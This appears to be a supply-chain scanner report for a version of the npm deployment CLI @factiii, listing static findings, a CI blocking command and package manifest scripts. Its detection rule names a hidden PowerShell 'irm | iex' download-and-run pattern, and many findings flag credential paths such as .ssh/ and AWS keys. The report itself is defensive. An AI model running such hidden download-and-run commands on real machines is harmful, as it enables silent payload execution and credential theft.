Package evidence
@factiii/[email protected]
Js Hidden Powershell: Hidden / non-interactive PowerShell invocation in package code — `-WindowStyle Hidden`, `irm | iex`, `windowsHide: true`, or equivalent — used to download-and-run payloads on Windows installers.
Trust signals
Why this verdict
PkgRadar discounts a release’s score when public reputation argues against novel malware. The verdict above already reflects these — the panel just explains what was applied.
- Versions published
- 191
- First published
- Feb 2026
- Publisher
- jsnyder10
Recommended action
Review before promotingMixed signals: the package has indicators worth reading before allowing the update in automated dependency flows.
Block this release in CIcurl · GitHub Actions
Fail the build when this package version is added or upgraded. Replace $PKGRADAR_TOKEN with a Pro / Team API key from your dashboard.
curl -fsS https://pkgradar.com/gate/npm \
-H "Authorization: Bearer $PKGRADAR_TOKEN" \
-H "Content-Type: application/json" \
-d '{"specs":["@factiii/[email protected]"],"fail_on":"review"}'GitHub Actions step:
- name: PkgRadar gate
run: |
curl -fsS https://pkgradar.com/gate/npm \
-H "Authorization: Bearer ${{ secrets.PKGRADAR_TOKEN }}" \
-H "Content-Type: application/json" \
-d '{"specs":["@factiii/[email protected]"],"fail_on":"review"}'Why flagged
What the scanner saw
Js Hidden Powershell: Hidden / non-interactive PowerShell invocation in package code — `-WindowStyle Hidden`, `irm | iex`, `windowsHide: true`, or equivalent — used to download-and-run payloads on Windows installers.
Not observed: package install, lifecycle script execution, or sandbox execution. PkgRadar only inspects on-disk artifacts.
Availability ledger
available
Status history (1 event)
- new → available · risk review · score 135 · status changed
Evidence
Static findings
24 static · 0 from release diff · showing high-signal first.
| Severity | Kind | Path | Detail | Points |
|---|---|---|---|---|
| high | Js Hidden Powershell | package/dist/plugins/servers/windows/index.js | Hidden / non-interactive PowerShell invocation in package code — `-WindowStyle Hidden`, `irm | iex`, `windowsHide: true`, or equivalent — used to download-and-run payloads on Windows installers. | 45 |
Show all 24 findings (low-signal and informational)
| Severity | Kind | Path | Detail | Points |
|---|---|---|---|---|
| high | Js Hidden Powershell | package/dist/plugins/servers/windows/index.js | Hidden / non-interactive PowerShell invocation in package code — `-WindowStyle Hidden`, `irm | iex`, `windowsHide: true`, or equivalent — used to download-and-run payloads on Windows installers. | 45 |
| low | Credential file access | package/dist/plugins/pipelines/aws/utils/aws-helpers.js | matched "AWS_ACCESS_KEY" | 5 |
| low | Credential file access | package/dist/plugins/pipelines/aws/scanfix/credentials.js | matched "AWS_SECRET_ACCESS_KEY" | 5 |
| low | Credential file access | package/dist/cli/deploy.js | matched ".ssh/" | 5 |
| low | Credential file access | package/dist/cli/dev-reset.js | matched ".ssh/" | 5 |
| low | Credential file access | package/dist/plugins/pipelines/aws/scanfix/ec2.js | matched ".ssh/" | 5 |
| low | Credential file access | package/dist/plugins/pipelines/factiii/scanfix/env-files.js | matched "AWS_ACCESS_KEY" | 5 |
| low | Credential file access | package/dist/cli/execute-plugin-command.js | matched ".ssh/" | 5 |
| low | Credential file access | package/dist/plugins/pipelines/aws/scanfix/iam.js | matched ".aws/" | 5 |
| low | Credential file access | package/dist/plugins/pipelines/aws/index.js | matched ".ssh/" | 5 |
| low | Credential file access | package/dist/plugins/servers/mac/index.js | matched ".ssh/" | 5 |
| low | Credential file access | package/dist/plugins/servers/ubuntu/index.js | matched ".ssh/" | 5 |
| low | Credential file access | package/dist/plugins/pipelines/aws/prod.js | matched "AWS_ACCESS_KEY" | 5 |
| low | Credential file access | package/dist/plugins/pipelines/factiii/prod.js | matched ".aws/" | 5 |
| low | Credential file access | package/dist/cli/scan.js | matched ".ssh/" | 5 |
| low | Credential file access | package/dist/utils/secret-prompts.js | matched ".ssh/" | 5 |
| low | Credential file access | package/dist/cli/secrets.js | matched "AWS_SECRET_ACCESS_KEY" | 5 |
| low | Credential file access | package/dist/plugins/pipelines/factiii/scanfix/secrets.js | matched ".ssh/" | 5 |
| low | Credential file access | package/dist/plugins/pipelines/factiii/scanfix/server-github-access.js | matched ".ssh/" | 5 |
| low | Credential file access | package/dist/plugins/pipelines/aws/scanfix/ssh-bridge.js | matched ".ssh/" | 5 |
| low | Credential file access | package/dist/utils/ssh-helper.js | matched ".ssh/" | 5 |
| low | Credential file access | package/dist/plugins/pipelines/factiii/scanfix/migrations/ssh-keys-location.js | matched ".ssh/" | 5 |
| low | Credential file access | package/dist/plugins/pipelines/factiii/scanfix/ssh-verify.js | matched ".ssh/" | 5 |
| low | Credential file access | package/dist/utils/template-generator.js | matched "AWS_ACCESS_KEY" | 5 |
Manifest
Package metadata
Scripts10
buildtsc && npm run copy-assetsbuild:watchtsc --watchcleannode -e "const fs=require('fs');if(fs.existsSync('dist'))fs.rmSync('dist',{recursive:true,force:true})"copy-assetsnode -e "const fs=require('fs'),p=require('path');fs.cpSync('src/plugins/approved.json','dist/plugins/approved.json');const d='dist/plugins/pipelines/factiii/workflows';fs.mkdirSync(d,{recursive:true});for(const f of fs.readdirSync('src/plugins/pipelines/factiii/workflows').filter(f=>f.endsWith('.yml')))fs.cpSync(p.join('src/plugins/pipelines/factiii/workflows',f),p.join(d,f));const pd='dist/plugins/pipelines/aws/policies';fs.mkdirSync(pd,{recursive:true});for(const f of fs.readdirSync('src/plugins/pipelines/aws/policies').filter(f=>f.endsWith('.json')))fs.cpSync(p.join('src/plugins/pipelines/aws/policies',f),p.join(pd,f))"prebuildnpm run cleanprepublish-checknode -e "const v=require('./package.json').version; if(v.includes('-d')){console.error('Cannot publish dev version:',v); process.exit(1)}; const ua=process.env.npm_config_user_agent||''; if(!ua.includes('pnpm')){const d=require('./package.json').dependencies||{}; for(const[k,v2]of Object.entries(d)){if(String(v2).startsWith('workspace:')){console.error('ERROR: workspace protocol found for '+k+'. Use pnpm publish (not npm publish) so workspace: references are resolved.');process.exit(1)}}}"testjesttest:coveragejest --coveragetest:watchjest --watchtypechecktsc --noEmit
Dependencies15
@aws-sdk/client-ec2^3.750.0@aws-sdk/client-ec2-instance-connect^3.1001.0@aws-sdk/client-ecr^3.750.0@aws-sdk/client-iam^3.750.0@aws-sdk/client-rds^3.750.0@aws-sdk/client-route-53^3.1001.0@aws-sdk/client-s3^3.750.0@aws-sdk/client-ses^3.750.0@aws-sdk/client-sts^3.750.0@factiii/auth^0.12.0@octokit/rest^20.0.2ansible-vault^1.3.0commander^11.1.0js-yaml^4.1.1libsodium-wrappers^0.7.11